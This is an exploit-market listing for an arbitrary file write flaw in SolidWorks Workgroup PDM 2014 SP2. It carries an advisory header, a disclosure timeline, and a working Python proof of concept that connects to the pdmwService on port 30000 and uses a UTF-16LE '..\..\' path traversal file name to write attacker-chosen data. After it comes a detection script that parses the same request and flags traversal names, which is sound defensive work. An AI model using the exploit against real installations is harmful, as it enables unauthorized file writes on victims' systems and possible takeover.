0day Today Exploits Market and 0day Exploits Database

SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability

Author: Mohamed Shetta
Risk: Security Risk Medium
0day-ID: 0day-ID-21935
Category: remote exploits
Date added: 22-02-2014
Platform: windows
'''
# Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability
# Date: 2-21-2014
# Author: Mohamed Shetta
# Email: mshetta |at| live |dot| com
# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm
# Tested on: Windows 7
# Vulnerability type: Arbitrary File Write
# Vulnerable file: pdmwService.exe
# Port: 30000
 
 
---------------------------------------------------------------------------------------------------------
Software Description:
 
SolidWorks Workgroup PDM is a PDM tool that allows SolidWorks users operating in
teams of 10 members or less to work on designs concurrently. With
SolidWorks PDM Workgroup, designers can search, revise, and vault CAD
data while maintaining an accurate design history.
 
 
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
 
This vulnerability allows remote attackers to write arbitrary files on vulnerable installations of SolidWorks Workgroup PDM.
 
------------------------------------------------------------------------------------------------------------
Disclosure timeline:
 
12/15/2013 - Vendor notified and no response.
2/21/2014 - Public disclosure
'''
 
#!/usr/bin/env python
   
import socket
import struct
import ctypes
 
# File name as UTF-16LE bytes: ..\..\test
FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00"
Data="A"*1028              # file contents
FileSize=len(Data)
FNsz=len(FileName)         # file name length in bytes
OpCode="\xD0\x07\x00\x00"  # 0x000007D0, little-endian
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 30000))
# Request layout: opcode, 4-byte name length, name, 8-byte file size, file data
s.send(OpCode)
s.send(struct.pack("I", FNsz))
s.send(FileName)
s.send(struct.pack('<Q', FileSize))
s.send(Data)
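
A detection-side reading of the request above, as an added example that is not part of the original advisory or of the vendor's code: it parses the opcode, name length, UTF-16LE name and size fields and flags file names that resolve outside the directory being written to. The field layout is inferred from the order of the PoC's send calls; `parse_write_request`, `is_suspicious_name`, `inspect` and `sample_request` are hypothetical names, and the sample requests are constructed.

```python
import ntpath
import struct

# Opcode bytes D0 07 00 00 from the PoC, read as a little-endian uint32.
OPCODE_WRITE = 0x7D0


def parse_write_request(buf):
    """Return (file_name, declared_size), or None if buf is not this request."""
    if len(buf) < 8:
        return None
    opcode, name_len = struct.unpack_from("<II", buf, 0)
    end = 8 + name_len
    if opcode != OPCODE_WRITE or name_len % 2 or len(buf) < end + 8:
        return None
    name = buf[8:end].decode("utf-16-le", errors="replace")
    (size,) = struct.unpack_from("<Q", buf, end)
    return name, size


def is_suspicious_name(name):
    """True when the name can resolve outside the directory being written to."""
    norm = ntpath.normpath(name)  # collapses a\..\b and converts / to \
    drive, rest = ntpath.splitdrive(norm)
    if drive or rest.startswith("\\"):  # absolute, drive-relative or UNC path
        return True
    return norm == ".." or norm.startswith("..\\")


def inspect(buf):
    parsed = parse_write_request(buf)
    if parsed is None:
        return "not-a-write-request"
    return "alert" if is_suspicious_name(parsed[0]) else "ok"


def sample_request(name, data=b"x"):
    """Constructed test input in the layout assumed above."""
    raw = name.encode("utf-16-le")
    header = struct.pack("<II", OPCODE_WRITE, len(raw))
    return header + raw + struct.pack("<Q", len(data)) + data


if __name__ == "__main__":
    for n in ("..\\..\\test", "parts\\bracket.sldprt", "a\\..\\..\\x", "C:\\x"):
        print(n, "->", inspect(sample_request(n)))
```

Run the check on a reassembled TCP stream for port 30000 rather than on single packets, because the fields are sent with separate calls and may arrive in separate segments.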
